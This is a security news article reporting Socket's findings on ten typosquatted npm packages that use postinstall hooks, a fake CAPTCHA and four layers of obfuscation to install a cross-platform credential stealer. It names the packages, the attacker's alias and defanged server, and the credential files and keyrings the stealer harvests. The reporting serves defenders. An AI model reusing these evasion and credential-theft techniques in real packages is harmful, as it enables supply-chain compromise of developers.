npm Typosquat Campaign: 10 Malicious Packages Deliver PyInstaller Infostealer via Fake CAPTCHA

The Socket Threat Research Team has uncovered an extensive supply chain attack targeting the npm ecosystem, involving 10 malicious packages that deliver a multi-stage credential theft operation disguised as legitimate developer tools. The discovery marks one of the most elaborate npm malware campaigns of 2025, combining typosquatting, fake CAPTCHAs, and multi-layer obfuscation to deploy a powerful cross-platform information stealer.

The malicious packages were published on July 4, 2025, and remained live for over four months, amassing nearly 10,000 downloads before Socket researchers petitioned npm for their removal.

The attacker, using the alias “andrew_r1” and the email parvlhonor@gmx[.]com, uploaded fake versions of widely used open-source packages. Each mimicked legitimate npm libraries to deceive developers through typosquatting — the practice of using lookalike names.

The identified packages include:

• typescriptjs → mimicking TypeScript
• deezcord.js, dizcordjs, dezcord.js → mimicking discord.js
• etherdjs, ethesjs, ethetsjs → mimicking ethers.js
• nodemonjs → mimicking nodemon
• react-router-dom.js → mimicking react-router-dom
• zustand.js → mimicking zustand

Once installed, these packages execute malicious postinstall scripts that launch immediately, bypassing user awareness. Socket notes that “each package leverages npm’s postinstall hook to execute immediately upon installation, launching in a new terminal window to avoid detection during the install process.”

The malicious package.json files contained a postinstall script, such as:

"scripts": {
  "postinstall": "node install.js"
}

The associated install.js script detects the victim’s operating system and opens a new terminal to execute an obfuscated payload. This ensures persistence beyond the npm installation process and hides activity from developers.

Socket explains, “By spawning a new terminal window, the malware runs independently of the npm install process. Developers who glance at their terminal during installation see a new window briefly appear, which the malware immediately clears to avoid suspicion.”

The payload is wrapped in four layers of obfuscation, including:

• Self-decoding eval wrapper
• Dynamic XOR encryption
• URL encoding
• Control-flow obfuscation using mixed bases

The report highlights, “The use of mixed number bases (hexadecimal 0x, octal 0o/0O), bitwise operations, and nested state machines makes manual analysis extremely time-consuming.”

Upon installation, the malware displays a fake CAPTCHA prompt via Node’s readline interface to trick users into believing they are interacting with legitimate software.

The fake prompt outputs text such as “Please verify you are a human to continue installing” and mimics real npm installation messages like “Installing discord.js package…” with fabricated version numbers and contributor statistics.

After user input, the malware silently sends the victim’s IP address to the attacker-controlled server 195[.]133[.]79[.]43 via the endpoint /get_current_ip.

Socket explains, “This serves multiple purposes: logging which IP addresses installed the malware, potentially excluding certain countries, confirming the victim matches the target profile, and creating a record to identify security researcher activity.”

This allows the threat actor to profile and filter victims before delivering the main payload.

Once the victim interacts with the fake CAPTCHA, the malware automatically downloads a 24MB PyInstaller binary named data_extracter from the same server. The binary is customized for each platform (Windows, macOS, or Linux) using os.platform() detection.

Socket notes, “The data_extracter binary is a 24MB PyInstaller-packaged Python application designed for comprehensive credential theft across multiple platforms.”

This stealer harvests credentials from:

• System keyrings — Windows Credential Manager, macOS Keychain, and Linux SecretService
• Web browsers — extracting cookies, passwords, and session tokens
• Cloud and DevOps tools — .aws/credentials, .kube/config, .docker/config.json, .git-credentials

By exfiltrating session cookies, the malware can bypass multi-factor authentication and impersonate users in AWS, GitHub, Azure, and Google Cloud environments.

Socket adds, “Session cookies can remain valid for hours, days, or even weeks depending on the service’s configuration,” underscoring the potential for long-term unauthorized access.

The stolen credentials are compressed into ZIP archives and stored temporarily in directories such as /var/tmp or /usr/tmp before being transmitted to the attacker’s server.

Socket’s researchers confirm, “The malware creates an archive containing keyring exports, browser SQLite databases, configuration files with embedded API keys, OAuth token stores, and SSH private keys.”

This modular collection and packaging allow efficient data theft while reducing the chance of detection by traditional antivirus systems.

Related Posts:

• PyInstaller Flaw : Are Your Python Apps Vulnerable to Hijacking?
• Hackers Fake ChatGPT App to Spread Windows, and Android Malware
• Malicious Go Packages Target Developers with Hidden Loader Malware on Linux and macOS
• New XELERA Ransomware Campaign Spreading Through Malicious Documents
• Typosquatting & Backdoors: Lazarus’ Latest npm Campaign